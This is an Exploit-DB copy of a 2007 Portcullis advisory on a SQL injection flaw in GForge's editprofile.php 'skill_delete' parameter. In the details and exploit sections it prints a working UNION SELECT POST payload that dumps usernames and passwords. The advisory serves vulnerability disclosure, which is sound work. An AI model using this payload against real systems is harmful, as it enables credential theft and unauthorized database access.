Sql Injection Vulnerability In GForge

vendor:

by:

Summit Siddharth

7.5

CVSS

HIGH

Sql Injection

CWE

Product Name:

Affected Version From: All current versions till 4.6b2

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Sql Injection Vulnerability In GForge

The 'skill_delete' parameter in the '/www/people/editprofile.php' script is not properly sanitized, allowing an attacker to execute arbitrary SQL queries and potentially disclose usernames and passwords stored in the backend databases.

Mitigation:

Properly sanitize user input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Sql Injection Vulnerability In GForge

Portcullis Security Advisory 07-014

Vulnerable System: All current versions till 4.6b2

Vulnerability Title: Sql Injection

Vulnerability Discovery and Development: Portcullis Security Testing Services.

Credit for Discovery: Summit Siddharth - Portcullis Computer Security Ltd.

Affected systems: N/A

Vendor Status: emailed vendor 17/08/2007

Details:

vulnerable script:- /www/people/editprofile.php

'skill_delete' parameter is not properly sanitized. The following POST request made to the vulnerable script will result in disclosure of all the usernames/password stored in the backend databases.

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete

Impact: This could lead to unauthorized access of information.

Exploit:

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete .

This will work irrespective of the 'magic_quotes_gpc' php setting. 

# milw0rm.com [2007-09-13]